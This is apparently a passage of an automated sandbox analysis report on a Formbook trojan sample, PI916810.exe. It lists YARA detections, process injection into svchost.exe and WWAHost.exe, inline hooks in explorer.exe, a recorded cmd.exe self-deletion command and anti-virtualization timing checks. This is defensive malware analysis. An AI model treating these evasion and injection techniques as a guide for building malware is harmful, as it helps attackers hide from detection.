          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: PI916810.exe PID: 1856, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 6300, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: WWAHost.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@301/5@12/1
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CA2D5 GetLastError,FormatMessageW,0_2_004CA2D5
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004B8713 AdjustTokenPrivileges,CloseHandle,0_2_004B8713
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004B8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004B8CC3
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_004CB59E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004DF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_004DF121
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CC602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_004CC602
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00464FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00464FE9
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
          Source: C:\Users\user\Desktop\PI916810.exeFile created: C:\Users\user\AppData\Local\Temp\autA1F0.tmpJump to behavior
          Source: PI916810.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: PI916810.exeReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Users\user\Desktop\PI916810.exe "C:\Users\user\Desktop\PI916810.exe"
          Source: C:\Users\user\Desktop\PI916810.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI916810.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe "C:\Windows\SysWOW64\WWAHost.exe"
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PI916810.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI916810.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe "C:\Windows\SysWOW64\WWAHost.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\PI916810.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: PI916810.exeStatic file information: File size 1352192 > 1048576
          Source: PI916810.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: PI916810.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: PI916810.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: PI916810.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: PI916810.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: PI916810.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: PI916810.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: WWAHost.pdb source: svchost.exe, 00000002.00000003.2090463981.0000000005800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090278190.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091961931.00000000056A0000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486561760.0000000000260000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: svchost.exe, 00000002.00000003.2090463981.0000000005800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090278190.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091961931.00000000056A0000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486561760.0000000000260000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PI916810.exe, 00000000.00000003.2031252239.0000000003650000.00000004.00001000.00020000.00000000.sdmp, PI916810.exe, 00000000.00000003.2034353437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2032652059.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035726323.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003900000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.0000000003330000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2092837599.0000000003187000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2091092274.0000000002FDF000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.00000000034CE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: PI916810.exe, 00000000.00000003.2031252239.0000000003650000.00000004.00001000.00020000.00000000.sdmp, PI916810.exe, 00000000.00000003.2034353437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2032652059.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035726323.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003900000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.0000000003330000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2092837599.0000000003187000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2091092274.0000000002FDF000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.00000000034CE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4499137007.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4488075149.000000000387F000.00000004.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486940710.00000000028CD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4499137007.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4488075149.000000000387F000.00000004.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486940710.00000000028CD000.00000004.00000020.00020000.00000000.sdmp
          Source: PI916810.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: PI916810.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: PI916810.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: PI916810.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: PI916810.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004DC304 LoadLibraryA,GetProcAddress,0_2_004DC304
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00488B85 push ecx; ret 0_2_00488B98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041285C push cs; retf 2_2_0041285F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417008 pushfd ; retf 2_2_0041700F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004171EF push ds; iretd 2_2_004171FD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E992 push dword ptr [08CCB4BEh]; ret 2_2_0041E9AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E9B2 push dword ptr [0ECCDC24h]; ret 2_2_0041EACE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416A81 pushfd ; retf 2_2_00416A82
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417ABC push edi; ret 2_2_00417ABD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E46D push ebx; retf 2_2_0040E470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E530 push edi; ret 2_2_0041E532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004177BF push B417C20Bh; ret 2_2_004177C4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB02 push esp; retn 0000h2_2_038AEB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1E push esp; retn 0000h2_2_038AEB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE9B5 push esp; retn 0000h2_2_038AEAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_1060EB02 push esp; retn 0000h3_2_1060EB03
          Source: C:\Windows\explorer.exeCode function: 3_2_1060EB1E push esp; retn 0000h3_2_1060EB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_1060E9B5 push esp; retn 0000h3_2_1060EAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10BA19B5 push esp; retn 0000h3_2_10BA1AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10BA1B1E push esp; retn 0000h3_2_10BA1B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_10BA1B02 push esp; retn 0000h3_2_10BA1B03

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE4
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00464A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00464A35
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004E55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004E55FD
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004833C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004833C7
          Source: C:\Users\user\Desktop\PI916810.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\PI916810.exeAPI/Special instruction interceptor: Address: 10FE8C4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 219904 second address: 21990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 219B6E second address: 219B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2912Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7030Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 746Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 734Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeWindow / User API: threadDelayed 9842Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\PI916810.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100206
          Source: C:\Users\user\Desktop\PI916810.exeAPI coverage: 4.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 1.9 %
          Source: C:\Windows\explorer.exe TID: 5948Thread sleep count: 2912 > 30Jump to behavior
